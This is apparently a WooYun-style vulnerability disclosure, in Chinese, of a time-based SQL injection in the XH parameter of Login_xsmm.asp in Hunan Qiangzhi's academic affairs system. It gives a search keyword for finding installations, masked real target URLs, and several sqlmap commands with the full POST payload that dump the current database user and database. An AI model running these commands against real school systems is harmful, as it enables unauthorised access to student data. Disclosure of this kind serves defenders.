强智教务系统延时注入一枚

### 简要描述： 好多sa啊~ ### 详细说明： 看了一下乌云好像没人提交这个页面的注入，我就来提交一下吧~详细如下~ ``` 1、建站程序类型：ASP+MsSql 2、漏洞类型：SQL注入 3、缺陷文件：/Login_xsmm.asp 4、注入参数：XH 5.涉及版本：未知，求厂商明细 7、危害程度：高危 8、涉及厂商：湖南强智科技发展有限责任公司 9、厂商网站：http://www.qzdatasoft.com/ 10、安装量：非常大，案例页面：http://www.qzdatasoft.com/cgal.html 11、是否拥有源代码分析：暂无 12、关键字：数字校园平台--湖南强智科技发展有限责任公司--版权所有 13、是否默认配置：是 14、枚举案例【应乌云的要求，枚举5例】： <fieldset class="fieldset fieldset-mask"> <legend>mask 区域</legend> <pre><mask>1.http://**.**.**/Login_xsmm.asp_ 2.http://**.**.**/Login_xsmm.asp_ 3.http://**.**.**/Login_xsmm.asp_ 4.http://**.**.**/oa/Login_xsmm.asp_ 5.http://**.**.**/jw/Login_xsmm.asp_ 6.http://**.**.**/jiaowu/ </mask></pre> </fieldset> Login_xsmm.asp ``` [<img src="https://images.seebug.org/upload/201405/192053082e3df1b046ca3c6d1c5436a1e4b9364a.jpg" alt="01.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/192053082e3df1b046ca3c6d1c5436a1e4b9364a.jpg) ### 漏洞证明： #2.注入证明 ``` sqlmap -u "<fieldset class="fieldset fieldset-mask"> <legend>mask 区域</legend> <pre><mask>1.http://**.**.**/Login_x </mask></pre> </fieldset> smm.asp" --data "XH=aaaa&XM=aaaa&SFZH=123456789987654321&cmdsub=%D5%D2%BB%D8%C3%DC%C2%EB" ``` [<img src="https://images.seebug.org/upload/201405/1921075626737b515e112f7c3f055d938bb74ace.jpg" alt="02.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1921075626737b515e112f7c3f055d938bb74ace.jpg) ``` Sqlmap -u "<fieldset class="fieldset fieldset-mask"> <legend>mask 区域</legend> <pre><mask>1.http://**.**.** </mask></pre> </fieldset> 8181/Login_xsmm.asp" -data "XH=aaaa&XM=aaaa&SFZH=123456789987654321&cmdsub=%D5%D2%BB%D8%C3%DC%C2%EB" --time-sec 5 --current-user --current-db ``` [<img src="https://images.seebug.org/upload/201405/192110479d1cb780e54298627a6a71fdce28660f.jpg" alt="03.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/192110479d1cb780e54298627a6a71fdce28660f.jpg) ``` sqlmap -u "<fieldset class="fieldset fieldset-mask"> <legend>mask 区域</legend> <pre><mask>1.http://**.**.** </mask></pre> </fieldset> 8/Login_xsmm.asp" ---data "XH=aaaa&XM=aaaa&SFZH=123456789987654321&cmdsub=%D5%D2%BB%D8%C3%DC%C2%EB" --current-user --current-db ``` [<img src="https://images.seebug.org/upload/201405/1921201567141f89edabf3e2530169170d862a82.jpg" alt="04.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1921201567141f89edabf3e2530169170d862a82.jpg) ``` sqlmap -u "<fieldset class="fieldset fieldset-mask"> <legend>mask 区域</legend> <pre><mask>1.http://**.**.**/ </mask></pre> </fieldset> oa/Login_xsmm.asp" ---data "XH=aaaa&XM=aaaa&SFZH=123456789987654321&cmdsub=%D5%D2%BB%D8%C3%DC%C2%EB" --current-user --current-db ``` [<img src="https://images.seebug.org/upload/201405/1921295881bd036e750ec3196aeb791ba8f44850.jpg" alt="05.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1921295881bd036e750ec3196aeb791ba8f44850.jpg) ``` >sqlmap -u "<fieldset class="fieldset fieldset-mask"> <legend>mask 区域</legend> <pre><mask>1.http://**.**.**/ </mask></pre> </fieldset> jw/Login_xsmm.asp" ---data "XH=aaaa&XM=aaaa&SFZH=123456789987654321&cmdsub=%D5%D2%BB%D8%C3%DC%C2%EB" --current-user --current-db ``` [<img src="https://images.seebug.org/upload/201405/19213315b4da766ae402f4073b9f204d97adfe8b.jpg" alt="06.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/19213315b4da766ae402f4073b9f204d97adfe8b.jpg)